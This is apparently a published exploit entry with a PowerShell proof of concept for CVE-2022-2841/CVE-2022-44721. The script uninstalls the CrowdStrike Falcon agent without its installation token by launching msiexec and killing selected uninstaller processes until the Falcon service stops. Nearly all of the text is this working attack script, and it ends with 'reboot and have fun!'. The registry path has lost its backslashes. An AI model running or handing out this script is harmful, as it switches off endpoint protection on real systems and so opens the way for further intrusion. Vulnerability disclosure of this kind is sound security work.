CrowdStrike Falcon Agent version 6.44.15806 has an uninstall bypass flaw that works without an installation token.
advisories | CVE-2022-2841, CVE-2022-44721
# Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token
# Date: 30/11/2022
# Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team)
# Vendor Homepage: https://www.crowdstrike.com/
# Author Homepage: https://www.deda.cloud/
# Tested On: All Windows versions
# Version: 6.44.15806
# CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress.
$InstalledSoftware = Get-ChildItem "HKLM:SoftwareMicrosoftWindowsCurrentVersionUninstall"
foreach($obj in $InstalledSoftware){
if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))
{
$uninstall_uuid = $obj.Name.Split("")[6]
}
}
$g_msiexec_instances = New-Object System.Collections.ArrayList
Write-Host "[+] Identified installed Falcon: $uninstall_uuid"
Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."
Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"
while($true)
{
if (get-process -Name "CSFalconService") {
Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {
if (-Not $g_msiexec_instances.contains($_.id)){
$g_msiexec_instances.Add($_.id)
if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){
Start-Sleep -Milliseconds 100
Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]
stop-process -Force -Id $g_msiexec_instances[-1]
}
}
}
} else {
Write-Host "[+] CSFalconService process vanished...reboot and have fun!"
break
}
}